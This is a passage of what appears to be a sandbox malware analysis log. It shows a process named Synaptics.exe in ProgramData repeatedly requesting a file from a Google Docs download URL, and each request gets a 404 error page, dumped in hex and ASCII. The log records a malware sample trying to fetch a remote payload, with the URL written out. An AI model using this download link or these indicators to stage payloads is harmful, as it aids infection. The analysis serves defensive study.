                                                                                                                                                                                                                          16192.168.2.349760172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC47OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC50INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-t-xEVNIuAmkzXMY8aP5EfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC51INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 4d 77 36 39 6c 63 51 66 74 5a 42 45 67 6a 52 71 77 4d 76 30 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cMw69lcQftZBEgjRqwMv0Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC53INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC53INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          17192.168.2.349761172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC50OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC53INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-Zrg8_pabdy69ezfd0byLvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC54INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC54INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 73 41 32 61 72 78 63 6b 37 75 32 55 35 71 68 41 72 34 45 2d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dsA2arxck7u2U5qhAr4E-w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC56INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC56INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          18192.168.2.349762172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC56OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC56INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-RVtF3aLbLRDvajVCurLGVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC57INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC58INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 6f 54 6a 69 7a 63 4b 4f 42 47 52 47 77 45 37 67 69 49 5a 67 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GoTjizcKOBGRGwE7giIZgg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC59INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          19192.168.2.349763172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC56OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC59INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-Jwo8YNn7apHNif3dNNwORg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC60INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC61INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 78 48 33 6e 36 71 73 64 65 56 78 48 78 69 71 45 46 76 67 31 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                                                          Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uxH3n6qsdeVxHxiqEFvg1A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC62INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                                                          Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                                                          2022-05-27 02:38:22 UTC62INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          2192.168.2.349741172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:17 UTC6OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:17 UTC6INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:17 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-9ATWUqWplyjaZX-8YRpg4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          2022-05-27 02:38:17 UTC8INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 5a 56 52 47 45 53 42 74 69 30 2d 62 43 33 46 48 49 70 70 63 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                          Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WZVRGESBti0-bC3FHIppcQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                          2022-05-27 02:38:17 UTC9INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                                                          Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                                                          2022-05-27 02:38:17 UTC9INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          20192.168.2.349764172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
